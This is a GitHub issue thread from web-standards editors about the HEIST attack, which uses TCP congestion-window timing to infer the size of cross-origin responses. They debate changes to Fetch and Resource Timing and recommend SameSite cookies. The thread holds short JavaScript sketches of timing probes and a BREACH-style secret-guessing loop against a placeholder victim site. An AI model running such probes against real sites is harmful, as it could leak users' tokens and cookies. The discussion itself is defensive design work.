HEIST #64

Closed
igrigorik opened this issue Aug 4, 2016 · 74 comments
Labels
security-tracker Group bringing to attention of security, or tracked by the security Group but not needing response.

Comments

@igrigorik
Member

HEIST paper, ArsTechnica coverage, Twitter discussion

Reading through the paper, the core observation is: TCP congestion control can be (ab)used to infer the size of a (cross-origin) resource. Roughly:

  • Identify when the response headers are received:
    • fetch() promise resolution (for "no-cors" it resolves once the headers are in), XHR readyState (HEADERS_RECEIVED), Resource Timing's responseStart.
  • Identify when the response body has finished loading:
    • XHR readyState (DONE), onload() callbacks, Resource Timing's responseEnd.

Given both of the above, you can compute the time delta between when the headers were received and when the response ended (see the sketch below):

  • If the delta is small, the headers and response fit into the same congestion window.
  • If the delta is large, then with high probability the response exceeded the current congestion window (took multiple RTTs).

If the TCP connection is brand new, the above can effectively tell you whether the response is <14KB (i.e., whether it fits in IW10). An extended version for responses beyond IW10:

  • Open a connection and fetch a resource of known size to “pad” the congestion window with a known amount of data.
  • Request the resource whose size you want to know and observe whether it comes back in one or multiple RTTs - same criteria as above.
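
Concretely, a minimal sketch of the basic measurement (URL hypothetical; this assumes responseEnd is exposed for the response, which is part of what's debated below):

```js
// fetch() resolving marks time-to-headers; Resource Timing's responseEnd
// marks time-to-end-of-body. Both are on the performance.timeOrigin
// timeline, so the two can be subtracted directly.
async function headerToBodyDelta(url) {
  const entryPromise = new Promise(resolve => {
    new PerformanceObserver((list, observer) => {
      const entry = list.getEntriesByName(url)[0];
      if (entry) { observer.disconnect(); resolve(entry); }
    }).observe({ entryTypes: ['resource'] });
  });
  await fetch(url, { mode: 'no-cors', credentials: 'include' });
  const headersAt = performance.now(); // promise resolved: headers are in
  const entry = await entryPromise;    // entry is recorded once the body completes
  return entry.responseEnd - headersAt;
}
// Small delta: headers and body fit in the current congestion window.
// Large delta: the body likely required one or more extra RTTs.
```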

Aside, but related: it's possible to estimate the RTT via JavaScript. If you know the RTT and have a model for what you expect the congestion window to be, you can use that to observe whether the response took >1 RTT and arrive at the same results with a similar padding technique (knowing when the response headers are received improves accuracy, but isn't necessary).

Armed with the above, you can apply a compression oracle attack against the origin, à la BREACH. That said, I’m dubious of the claims in the paper about how practical this actually is: tripping over a congestion window boundary doubles said congestion window, and that ramps quickly, hence the query rate should be low... Am I missing something here?

Mitigations: all existing BREACH recommendations apply.


In terms of practical implications... /cc @annevk @slightlyoff @domenic

  • XHR / Fetch expose responseStart for cross-origin resources; RT requires TAO.
    • Q: Anything we want or need to do here?
  • There are many ways to infer responseEnd..
    • Q: I’m not sure whether anything can practically be done here, and if so, what?

Last but not least, scrubbing through the RT spec it looks like we introduced a bug in 88bb585?diff=split#diff-eacf331f0ffc35d4b482f1d15a887d3bL543, seemingly implying that responseEnd is subject to TAO. It's not.. Unless @plehegar had something else in mind here?

@igrigorik igrigorik added the security-tracker Group bringing to attention of security, or tracked by the security Group but not needing response. label Aug 4, 2016
@domenic

domenic commented Aug 5, 2016

I could use some help understanding how this attack works cross-origin. Shouldn't the fetch/XHR/resource timing/etc. automatically and instantly fail for such resources? (Assuming they are not shared via CORS.)

@danaucoin

danaucoin commented Aug 5, 2016

CSP headers would be needed as they handle the outbound rules. GET and POST aren't blocked by CORS.

@annevk
Member

annevk commented Aug 5, 2016

So one problem is that fetch() also resolves for "no-cors" when all the headers are in. In combination with something else, e.g. <img>, you can then probably measure a response body more accurately. A mitigation would be to delay resolving fetch() for "no-cors" until the response body is fully transmitted.

@annevk
Member

annevk commented Aug 5, 2016

I think whatwg/fetch#355 is the solution here, though it would be interesting to hear from @tomvangoethem and Mathy Vanhoef why they think that is infeasible (per section 4.1.1 of their paper).

@annevk
Member

annevk commented Aug 5, 2016

As @jakearchibald mentions, that issue has obvious perf implications that are not desirable. Arguably resource timing should not expose responseEnd for no-cors, especially since it's not always readily available (it isn't with fetch()). That still makes the platform susceptible to attacks that use multiple requests, one to figure out "start" and another for "end" (e.g., <iframe> load). However, that will get muddy with HTTP caches and such. We can also fiddle with when we expose "end" by delaying responses a little bit, but that would impact rendering.
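
For illustration, the "end"-measuring half of that two-request approach might look like this (URL hypothetical; as noted, HTTP caching muddies it):

```js
function timeIframeLoad(url) {
  return new Promise(resolve => {
    const frame = document.createElement('iframe');
    frame.style.display = 'none';
    const start = performance.now();
    frame.onload = () => resolve(performance.now() - start); // "end" signal
    frame.src = url; // navigations carry credentials (cookies)
    document.body.appendChild(frame);
  });
}
```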

None of this is ideal obviously.

@jakearchibald

Would padding end impact render? The rendering of an iframe can't be detected. The width/height of an image can, but that's way before response end

@jakearchibald

The problem is Resource Timing is designed to give an accurate number here, and that's baaad. Others we can (hopefully) make less accurate.

@yoavweiss
Contributor

yoavweiss commented Aug 5, 2016

I'm wondering whether we're trying to route around the problem in the hope that it will go away, instead of tackling it. As mentioned in #64 (comment), RTTs can be measured without any fancy APIs, using <img onload>. Determining whether a certain resource download took 1 or 2 RTTs doesn't require sub-millisecond precision on today's networks, unless the user is in the same data-center as the origin.

So, unless we're willing to delay certain events (and observable implications of resource loading) by tens of milliseconds for all users, this type of timing attack is not going away.

The underlying issue is that with BREACH, exposing response sizes equals exposing CSRF tokens and login cookies. Are all types of compression vulnerable to BREACH? Can we devise a compression scheme that won't be? (e.g. by adding random padding chars of random size </naive-hand-waving> - a naive sketch follows)
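
To make that hand-waving concrete, a naive Node.js sketch (function name invented). Known weakness: random padding only adds noise, and an attacker can average it away over repeated requests:

```js
const crypto = require('crypto');

// Append an HTML comment of random length and content so the compressed
// response size no longer deterministically reflects a reflected guess.
function padHtmlResponse(body) {
  const padLength = crypto.randomInt(1, 256);                   // random size
  const pad = crypto.randomBytes(padLength).toString('base64'); // random chars
  return body + `<!-- pad:${pad} -->`;
}
```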

@domenic

domenic commented Aug 5, 2016

@yoavweiss can you produce a demo of this attack using only <img onload>, if that's all that's required? That would certainly make your point clearer.

@jakearchibald

Delaying iframe load events seems ok, as long as it's fired after the frame has loaded.

Img is only useful if the response is a valid image; otherwise the error event can fire early.

@yoavweiss
Contributor

An image resource on the same host as the HTML under attack can be used to measure the RTT, as demonstrated in the article @igrigorik linked to. Since that article, img loading became async (in most browsers), but an attacker could probably use rAF (requestAnimationFrame) to estimate the time gap between adding the img and when it's actually triggered. That code snippet ignores potential connection establishment time, which can skew its results, but that can be mitigated with <link rel=preconnect>, or by simply repeating an image fetch from the same host twice.

That would give an attacker one piece of the puzzle: the base RTT. And even if we delayed <img onload>, this won't be mitigated unless we also delay the time at which the image request switches to the "partially available" state, since that time is highly observable due to intrinsic dimension changes. All image types but certain JPEGs are likely to switch to that state right when the first few bytes of image data come in.

@domenic - I hope that makes what I meant by "RTTs can be measured without any fancy APIs, using <img onload>" clearer.
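
A rough sketch of that double-fetch RTT estimate (URL hypothetical):

```js
// Time a single <img> fetch from the target host.
function timeImage(url) {
  return new Promise(resolve => {
    const img = new Image();
    const start = performance.now();
    img.onload = img.onerror = () => resolve(performance.now() - start);
    img.src = url + '?bust=' + Math.random(); // defeat the HTTP cache
  });
}

// The first fetch pays for DNS/TCP/TLS setup; the second reuses the warm
// connection, so its duration approximates one RTT plus server time.
async function estimateRTT(url) {
  await timeImage(url);
  return timeImage(url);
}
```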

Regarding delaying <iframe>'s onload, it might be helpful, but we'd need to delay it by a lot and we'd also need to delay onload for <script>, <link> and potentially others. Processing of the returned response on some of those might be observable, so we'd need to carefully figure that out and avoid such processing.

@jakearchibald - would we also need to introduce similar delays to the time fetch() promises are resolved in SW?

@annevk
Member

annevk commented Aug 5, 2016

RTT is not that useful on its own I think. What is important is time-to-headers, time-to-end-of-response-body, the difference between those, how much we expose in a single roundtrip, how much is exposed on several roundtrips, and how reliable those all are.

We can prevent exposing time-to-headers for no-cors, but the cost is a performance hit when you use service workers. (And an argument has been made that we also expose time-to-headers when you enable CORS, since CORS will fail at that point, but the request will also be different.)

We can also prevent exposing time-to-end-of-response-body for no-cors, at no cost, but then the question is whether you can still reliably determine it across several roundtrips and whether that is problematic.

@danaucoin

Excusing my ignorance in advance -

If the purpose of resource timing is to provide performance metrics (effectively a reporting tool) to a web dev/web admin, why does the API have to return those statistics directly to the requester? Shouldn't the resource timing data be sent to a destination specified by the page, and not necessarily back to the requester?

@yoavweiss
Contributor

RTT is not that useful on its own I think. What is important is time-to-headers

Good point - RTT and time-to-headers are only ~identical for static resources, whereas HEIST mostly targets dynamic components of a page (CSRF tokens, cookies), whose generation can add server-side time.

We can also prevent exposing time-to-end-of-response-body for no-cors

Can you elaborate on that?

@annevk
Member

annevk commented Aug 5, 2016

Can you elaborate on that?

By not handing out responseEnd. That way if you get time-to-headers with fetch(), you don't get time-to-end-of-response-body. (You might still get that in some other way, but that would be a different request, and then the other variables come into play.)

@annevk
Member

annevk commented Aug 5, 2016

@djohns14 I'm not sure what you're suggesting, but changing the fundamental nature of any API under discussion is not an option.

@jakearchibald

I don't think a CORS request and a no-cors request are different enough to matter much, but maybe I'm missing something.

In terms of response end, we need to delay cache put, which is fine as it isn't all that perf sensitive. We might need to think about appcache writes too.

@sleevi

sleevi commented Aug 5, 2016

From the peanut gallery, it does seem strongly inadvisable to try to just monkey-patch around this without articulating your threat model or assumptions. I think @yoavweiss has the right idea in pointing out that we have a variety of leaks.

It's also important to keep in mind the context of what we're discussing, re: BREACH attacks, and the available server-side mitigations for these.

I'm not suggesting we "do nothing", but rather we work from first principles to make sure the platform is both secure and consistent. Minimally, that starts with elaborating the actual threat model we're wishing to defend against. Are we attempting to stop BREACH attacks? Are we attempting to stop knowledge of response body size? etc. Once we get those principles down, collectively take a look at the platform and look where we can leak that information, so we have a sense of the damage, and then we can brainstorm mitigations.

While this is very exciting, sexy, and arguably disturbing (in that "we probably should have seen this coming" feeling afforded by 20/20 hindsight), we shouldn't be reactionary. In my mind, this is similar to concerns regarding privacy/tracking: concerns which are real, and grounded, but when you see something like https://www.chromium.org/Home/chromium-security/client-identification-mechanisms, you have a better appreciation for the holistic picture and for where and why various piece-meal solutions ... aren't.

But that's just my $.02

@igrigorik
Member Author

@sleevi 100% agree. I'll take a run at it...

Cross-site timing attacks

Make a cross-origin request and observe some properties of it: how long it takes to error, succeed, whatever. The canonical example here is to make an authenticated request (e.g. load an image) against some behind-the-login-screen resource and time the response: if the user is logged in they’ll get back the page, otherwise a login page/redirect; the delta between those responses may be large enough to learn something about the user.
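
A minimal sketch of that canonical example (URL hypothetical):

```js
// Time an authenticated cross-origin load. onerror fires for non-image
// responses, but the elapsed time still reflects the server's work.
function timeAuthenticatedLoad(url) {
  return new Promise(resolve => {
    const img = new Image();
    const start = performance.now();
    img.onload = img.onerror = () => resolve(performance.now() - start);
    img.src = url; // sent with the user's cookies
  });
}

// A slow response for a behind-the-login resource may indicate a logged-in
// user; a fast redirect to the login page may indicate the opposite.
timeAuthenticatedLoad('https://bank.example/account/summary.png').then(console.log);
```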

Practically speaking, I don’t think the UA can “defend” against this type of attack as long as it allows any form of cross-origin authenticated requests, as the timing is subject to server-specific logic and response processing. We’re not going to enforce a constant time on all responses (that’s ludicrous), and padding random deltas to responses is similarly silly.. you’d have to make those very large, and the performance implications of that would be unacceptable.

The server, on the other hand, can and should protect its sensitive resources against such attacks. Set X-Frame-Options and inspect the Referrer header and adjust the response accordingly... i.e. existing best practices. Also, as a user, I guess you can disable third-party cookies.

In practice these timing attacks are also hard to exploit due to variable response times, network latency, buffering delays, etc. HEIST offers an accuracy improvement: use the TCP congestion window to trigger an extra RTT and learn information about the size of the resource. I still have reservations about how many queries you can practically make with this approach, but regardless, it is an improvement on what was documented earlier.. and hence the server-side mitigations mentioned earlier are all the more relevant.

Compression oracle attacks

These attacks require (a) a mechanism to estimate the size of an encrypted response and (b) the ability to reflect known data within the response. HEIST outlines how you can use TCP’s congestion window to achieve (a). You then need to find a target that satisfies (b)... Mitigations: all the same as above, plus other precautions like masking your tokens on each request.
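
To make (a) + (b) concrete, a hypothetical BREACH-style guess loop; probeSize is an assumed helper that estimates the encrypted response size (e.g. via the congestion-window technique above), and the URL is invented:

```js
// Extend a known prefix of the secret one character at a time: a guess that
// matches real secret bytes compresses better, shrinking the response.
async function guessNextChar(prefix, alphabet, probeSize) {
  let best = null;
  let bestSize = Infinity;
  for (const c of alphabet) {
    const size = await probeSize(
      `https://victim.example/search?q=csrf_token=${prefix}${c}`);
    if (size < bestSize) { bestSize = size; best = c; }
  }
  return best;
}
```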


Re, responseEnd: you don’t need Resource Timing to get at this data. You can time the duration of a network fetch by simply timing an image/object load, and I’m sure there are other, more creative ways to obtain this as well. Resource Timing doesn’t expose anything new here, and hiding responseEnd / duration for cross-origin resources doesn’t win us anything. Conversely, duration is a critical datapoint for sites that embed third-party content and need to monitor their impact on site performance.

Re, fetch resolving on headers: the reason this one is used in HEIST is because it allows the attacker to measure [time to first byte, time to response end] delta and obtain a more accurate answer for whether the body came in within one RTT of header data or if it was split over multiple RTTs. That said, even without this mechanism, the attacker can estimate the RTT by making other requests / observing traffic and then subtract that from total fetch duration to get a similar estimate for whether a request triggered extra RTT due to exhausted CWND. The latter approach is less accurate, but my hunch is that not significantly so once you apply any statistical method (i.e. gather this across multiple responses). On the other hand, just because you know when the header came in also doesn’t mean you can reliably state that a response that is less than the current-CWND will arrive within one RTT—e.g. packet drops and reordering, high BDP between client and server, random buffer delays along the way, etc. So.. shrug, you win some, you lose some, but the exposure is still there regardless.


With the above in mind... We already knew that timing and guesstimates of response size can be used as a side channel, and we have established best practices that app developers should deploy to protect themselves. HEIST is a reminder of why those are important, and as far as I can tell, if the origin has already taken precautions against BREACH, then HEIST doesn’t add any new surface area. I think that's the main message and takeaway from this exercise.

Discussed changes to RT/Fetch won't solve the underlying attacks. They may reduce accuracy in some instances, but (a) it's not clear how much so, and (b) they would introduce significant negative performance implications for the rest of the platform.. Which makes me think that the tradeoff, at least for the options on the table so far, is not worth it.

@tomvangoethem

The reason we didn't consider resolving fetch() only once the complete body is in to be a complete solution is that if there is just a single observable event (direct or indirect) that happens when the headers of an opaque response are in, the attack resurfaces. While it may be possible to track down all the directly observable events, I am not convinced all possible side-channels can easily be identified.

Knowing the time-to-headers is indeed not a requirement. On connections where the jitter/RTT ratio is small, it shouldn't be too hard to determine whether 1 or 2 RTTs were needed (in contrast to 0 vs 1 in HEIST). As such, just knowing time-to-end-of-response-body will probably be enough.

Ideally, I would like to see a general defence where it's simply not possible to perform these attacks, regardless of the possible side-channels that may be exploited. Currently, the only way I see how this would work is by disabling authenticated no-cors requests (or simply stripping the cookies).

We are currently exploring a general technique based on leveraging the DEFLATE algorithm to counter BREACH-like attacks. However, simply knowing the length of a resource (regardless of compression) has its own security/privacy consequences (see whatwg/storage#31 for example).

@jakearchibald

If we rebooted the web today, any cross-origin communication would require CORS, or be no-credentials like you suggest.

I just don't see how we can do that now with 20 years of content depending on current behaviour.

@jakearchibald

We could have a header to opt out of no-cors access, similar to https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options

@jakearchibald

I realise an opt-in isn't ideal, but some kind of Access-Control-Allow-Credentials: NEVARR! header would also mitigate whatwg/html#1427

@annevk
Member

annevk commented Aug 6, 2016

See my From-Origin header from some years back. We want something that prevents embedding from the wrong origin, including nested browsing contexts, but does not prevent top-level navigation. Note that omitting credentials does not necessarily help with intranet resources.

@jakearchibald

jakearchibald commented Aug 6, 2016

https://www.w3.org/TR/from-origin/

Seems like what we're after (if opt-in is the best we can do), but it should apply to all requests, not just embedding (maybe that's the intent; the spec talks about embedding a lot). What stopped work on this?

@annevk
Member

annevk commented Aug 6, 2016

Yeah, it needs some tweaks, but we should not block top-level navigation. (And maybe we should continue allowing requests without credentials…)

Work stopped since nobody wanted to implement it.

@jakearchibald

we should not block top-level navigation

target="_blank" should be ok too, since the client doesn't have access to a load event. window.open with noopener prevents load events too I think?

@annevk
Member

annevk commented Aug 6, 2016

Yeah, probably. I'd like to think through the whole popups question a bit more, and which browsing contexts end up being grouped together, before firmly answering that. But definitely "noopener" has the semantics of creating a top-level rather than auxiliary browsing context.

So yeah, maybe reviving that header in some form in Fetch is a good step towards offering some kind of protection against this. Especially now that https://w3c.github.io/webappsec-epr/ is being parked.

@annevk
Member

annevk commented Aug 11, 2016

@jakearchibald no, but see my speculation above on how it's likely due to CORS.

@igrigorik
Member Author

(Side note: Adam pointed out that I was linking to an outdated draft earlier in the thread; we should be referring to The HTTP Origin Header Field in RFC 6454 instead.)

I asked Adam about the change from "MUST send" in earlier drafts to "MAY send" in the RFC: "the IETF didn't want to publish a spec that made every existing HTTP implementation non-conformant". That said, note that the UA requirements section leaves this wide open:

The user agent MAY include an Origin header field in any HTTP request.
Whenever a user agent issues an HTTP request from a "privacy-sensitive"
context, the user agent MUST send the value "null" in the Origin header field.

NOTE: This document does not define the notion of a privacy-
sensitive context. Applications that generate HTTP requests can
designate contexts as privacy-sensitive to impose restrictions on
how user agents generate Origin header fields.

So, the change from MUST to MAY is/was a spec-compat issue. The UA is free to send Origin on any request, and it seems that current implementations simply chose to limit themselves to CORS and POST requests. Which, given what we know today, is a decision we should probably revisit...

  • ~Send Origin on any cross-origin request (cors and no-cors)?
  • ~Define some interop with Referrer. E.g. if Referrer policy is set to none, then send "null" in Origin header, or some such.

@jakearchibald

jakearchibald commented Aug 11, 2016

Send Origin on any cross-origin request

It would need to be on all requests right? If I'm trying to emulate From-Origin, I only want to respond if Origin is my origin. Still need a header that indicates top-level vs aux.

@annevk
Member

annevk commented Aug 11, 2016

Again, I don't think we can send Origin on any request, and I'm pretty sure Adam found that out too when he tried back in the day. Especially now that CORS is much more widely used, it's highly likely servers use it as a conditional and would end up breaking navigation and such.

@igrigorik
Member Author

@jakearchibald if all UAs sent Origin on every cross-origin request (cors and no-cors), then the absence of such a header would allow the server to restrict responses to "my origin only", as well as whitelist particular origins. That said, since we already have Origin implementations out in the wild that don't conform to this... it makes it complicated to deploy. With that in mind:

  1. @annevk, your Origin proposal in Should we send an Origin header for no-cors fetches? whatwg/fetch#225 (comment) makes sense to me.
  2. By the looks of it, we need a new Bikeshed header (le sigh.. but at least now we know what we need to solve for :)) that would cover the no-cors cases, top-level vs aux, etc.

@jakearchibald

@igrigorik good point. I was thinking no-referrer would also remove the origin header, but it would make it explicitly null. Happy for Bikeshed to follow these rules.

So are you suggesting that Bikeshed would also include the top-level/aux info rather than a separate header? I guess that's fine, just needs more parsing.

One less header to vary on.

@igrigorik
Member Author

Tried to write down what we could recommend to developers with existing mechanisms...


Use First Party (FP) cookies for all authenticated content that's not meant to be embedded or accessible cross-origin: "Strict" mode provides strong protection, "Lax" provides reasonable protection (modulo top-level navigations). With FP in place...

If the Origin header is present in the request, then it's either a CORS request, or a request whose method is neither HEAD nor GET (whatwg/fetch#225 (comment)). Inspect the value of the Origin header for the source origin of such requests to determine whether you want to allow the request - see HTTP access control (CORS).

Otherwise, if the Origin request header is missing, the request is either:

  • same-origin, in which case the FP cookie should be present.
  • cross-origin, in which case the FP cookie is subject to policy and initiator:
    • If the FP policy is "Strict", then the cookie should not be there.
    • If the FP cookie policy is "Lax", then the FP cookie is only present for top-level navigation requests that use a "safe" HTTP method.
      • When using the "Lax" FP policy you can distinguish same-origin requests from cross-origin top-level navigation requests by inspecting the Referrer header: as long as your policy is not set to no-referrer, same-origin requests will contain a Referrer header whose origin is your origin.

BigBank.com has authenticated resources that should not be accessible cross-origin. It can either:

  1. set FP cookie policy to "Strict" and be done with it.
  2. set FP cookie policy to "Lax" and use a combination of Origin and Referrer headers to distinguish between same-origin requests and cross-origin top-level nav requests, and potentially disallow the latter - see the sketch below.
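
A hypothetical server-side sketch of option 2 (plain Node.js, names invented; assumes the session cookie was set with SameSite=Lax and that the page's referrer policy is not no-referrer):

```js
// Decide whether an authenticated resource may be served.
function isAllowedRequest(req, myOrigin) {
  const origin = req.headers['origin'];
  if (origin !== undefined) {
    // CORS request, or a method other than GET/HEAD: allow only ourselves.
    return origin === myOrigin;
  }
  // No Origin header: a same-origin subresource or a top-level navigation.
  // A "Lax" cookie is still sent on cross-site top-level GET navigations,
  // so use the Referer header to tell those apart.
  const referer = req.headers['referer'];
  return referer === undefined || referer.startsWith(myOrigin);
}
```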

Do we need anything else? It seems like the combination of FP, Origin, and Referrer might do the trick.

@annevk
Member

annevk commented Aug 12, 2016

We can only give this advice if a) all browsers implement same-site cookies, b) all browsers implement the "new" Origin header semantics, c) we couple it with an HTTPS requirement.

And again, this does not deal with 1) HTTP authentication, 2) TLS client certificates, 3) firewalled content.

@annevk
Member

annevk commented Aug 12, 2016

If we did Bikeshed by the way, I think b) would be better addressed by all browsers implementing Bikeshed and only using Origin for CORS as that would improve the CORS protocol.

@igrigorik
Member Author

Contrary to what many may believe, I do prefer solutions that avoid minting new headers. :bowtie: Especially so when we're talking about a header that would have to be attached to most every request—which, I think, is what we're looking at here. Hence me trying to understand whether we actually need a new header, or if we can compose a solution out of existing parts.

We can only give this advice if a) all browsers implement same-site cookies, b) all browsers implement the "new" Origin header semantics, c) we couple it with an HTTPS requirement.

As far as I can tell, Chrome is already effectively (b), we have (a) on the way, and in this day and age (c) goes without saying... 😎. Further, both (a) and (b) have existing efforts behind them, so if we can give them a kick through additional use-cases/motivation, then that's a win in my books. Building our own thing will take just as long, if not longer.

That aside, you're right, I ignored HTTP/TLS auth and firewalled content. It wasn't clear to me how it impacts what we're discussing here.. can you elaborate a bit more?

@annevk
Member

annevk commented Aug 13, 2016

You could still do timing attacks on resources that are firewalled or HTTP/TLS authenticated. Basically the same as with cookies.

(It's not entirely clear by the way what Origin adds over just using lax cookies.)

@igrigorik
Member Author

You could still do timing attacks on resources that are firewalled or HTTP/TLS authenticated.

Hmm, well.. you could just drop a first-party cookie on any such resources, right? Same logic.

It's not entirely clear by the way what Origin adds over just using lax cookies.

Yeah, that's fair, you can probably simplify my earlier post to FP + Referrer.


Stepping back, we covered a lot of ground in this thread.. My takeaways:

  • we are not making any changes to Fetch or Resource Timing
  • we should encourage developers to deploy server-side logic to protect sensitive resources
    • BREACH recommendations apply, but we established that Referrer alone is not sufficient
    • First-Party cookies go a long way towards resolving this problem:
      • In strict mode, they provide strong protection.
      • In lax mode, they can be combined with Referrer to provide strong protection.

With the above in mind, I propose that we resolve this thread and go nudge folks working on FP. I can write up a summary of our discussion here.

@jakearchibald

jakearchibald commented Aug 15, 2016

in lax mode, it can be combined with Referrer to provide strong protection.

It's still not clear to me when cookies would be sent with "lax" mode. What about <link rel="prerender">?

I don't see how referrer helps here either. If you're vulnerable to GET, you're in a really bad place.

@igrigorik
Member Author

It's still not clear to me when cookies would be sent with "lax" mode.

The behavior is defined in https://tools.ietf.org/html/draft-west-first-party-cookies-07#section-4.3. If that's not sufficient, then we should open a bug against httpwg: https://github.com/httpwg/http-extensions/issues?q=is%3Aopen+is%3Aissue+label%3A6265bis /cc @mikewest @mnot

Re, prerender: I'll follow up on the linked issue.

igrigorik added a commit that referenced this issue Aug 15, 2016
This was mistakenly introduced in a previous [1] refactoring of the
spec. For related discussion, see [2].

[1] 88bb585
[2] #64
@igrigorik
Member Author

Updated RT spec (7358cbd) and removed the (broken) TAO-check reference -- see my very first post + linked commit on this thread for details. I believe that's the only actionable change for RT from this discussion.. If anyone else has other suggestions, let me know.

@jakearchibald

Seems like <a href="…" target="_blank"> does not create a top-level browsing context. That's not so great; I'd expect to get cookies in "lax" mode in that case.

window.open won't get cookies, which is great (although we may want to allow them with the noopener option). clients.openWindow() is top level, so it will get cookies.

@jakearchibald

Filed httpwg/http-extensions#226

@annevk
Member

annevk commented Aug 16, 2016

Hmm, well.. you could just drop a first-party cookie on any such resources, right? Same logic.

I don't understand.

@mikewest
Member

mikewest commented Aug 16, 2016

Use First Party (FP) ...

Nit: We renamed this before shipping, so if/when you write anything up, please try to minimize the confusion. :)

<a href="…"> - yes
<iframe> - no
window.open() - I would hope no
<a href="…" target="_blank"> - I would hope yes
clients.openWindow() - I would hope yes
<link rel="prerender"> - ??? (hence w3c/resource-hints#63)

As noted in the bug Jake filed against SameSite, Lax same-site cookies would be sent with all of these (presumably cross-origin) (pre-)navigations, with the exception of <iframe> (because auxiliary browsing contexts are also top-level browsing contexts). That was intentional, as SameSite's target was CSRF, so the request is what mattered for the cookie state, not the exposure via Window objects.

@igrigorik
Member Author

@annevk as in, regardless of what authentication mechanism you use (HTTP auth, TLS auth), when you first authorize the user you can just drop a SameSite cookie and then observe whether it's echoed in subsequent requests to determine if they are same-origin or cross-origin.

@annevk
Member

annevk commented Aug 16, 2016

I'm starting to agree with @mikewest's remarks elsewhere that the opt-in defense is not ideal and unlikely to be deployed. But I'm not sure how we can do better, other than maybe making the opt-in not rely on new cookie infrastructure, but on something closer to a boolean.

@sleevi

sleevi commented Aug 16, 2016

While I'm sympathetic to @mikewest's position, I'm absolutely convinced this is not something that the browser caused, contributes to, or can fix at this point. This is, at the core, similar to something like SQL injection - it's a server choice (to compress responses), and using compression - whether over a secure channel or otherwise - leaks status information.

While I appreciate @igrigorik's efforts at coming up with a threat model, I think it's utterly futile to suggest that the browser could be put in a position where it could make all loads unobservably side-effect free, without the cooperation or knowledge of the server. There are going to be timing leaks throughout the system - whether at the CPU cache layer, at the IO interrupt layer from the NIC, from contention on the network, from congestion windows, from system timers - all of them outside the browser's ken and remit. We simply can't design a system that, under this threat model, is constant-time, and without that constant-time property, we cannot guarantee that the secrets remain secret.

So we have to do one of two things - prevent requests from being made that might result in secrets being sent, or help server operators understand the risks of sending secrets. While SameOrigin or Bikeshed or whatever we want can quasi-help with the former, the past two decades of the Web have also taught us that servers are, almost universally, very bad at determining what is or should be secret (case study: the opposition to HTTPS). So even if we were to prevent most (all?) forms of cross-origin credential sharing, there are going to be secrets, and so there are going to be side-channels here. Which leads to the only other option that seems at all practical, which is educating on the server side.

I think the focus on the "Web Platform Features" enabling this is arguably misguided, because what we're talking about is constant-time vs variable-time behaviour, and anyone who works in that space can tell you how hard it is to get right.

To the extent we could block cookies (and TLS client certs, and whatever H/2+TLS1.3 method the IETF comes up with), great, but I think we know that the risk of breakage is high for any solution, because it's not backwards compatible, and thus our option is "Opt In". Or tell servers to stop supporting compression if they can't do it securely. Or stop advertising in browsers that we support compression.

@igrigorik
Member Author

I think it's utterly futile to suggest that the browser could be in a position so it could make all loads unobservably side-effect free, without the cooperation or knowledge of the server. So we have to do one of two things - prevent requests from being made that might result in secrets being sent, or help server operators understand the risks of sending secrets.

Agreed, and my direction here has been to figure out what (if anything) we need to give server operators to make it possible for them to make an informed decision about whether a response should be allowed to contain secret / authenticated data.

I think the focus on the "Web Platform Features" enabling this are arguably misguided, because what we're talking about is the ability for constant-time vs variable-time, and anyone who works in that space can tell you how hard it is to make sure it's right.

So, to clarify.. The problem, as I see it, is that we allow authenticated cross-origin requests that the origin server can't distinguish from same-origin requests. As a result, the server ends up leaking secrets because existing recommendations (e.g. look at Referrer / Origin headers) would also block top-level navigations. So, we do need some new "web platform feature" to allow servers to solve this.. SameOrigin cookies might be sufficient, or maybe we need Bikeshed instead.

@igrigorik
Member Author

A quick summary of our discussion here: https://www.igvita.com/2016/08/26/stop-cross-site-timing-attacks-with-samesite-cookies/ - tl;dr: use SameSite cookies.

As outlined in #64 (comment), we are not making any changes to RT or Fetch; closing this thread. Perhaps there are other mechanisms we ought to consider, in addition to encouraging adoption of SameSite cookies, but whatever that may be.. we should take that discussion to the appropriate forum (webappsec group, probably).

p.s. thanks everyone for your help and input!
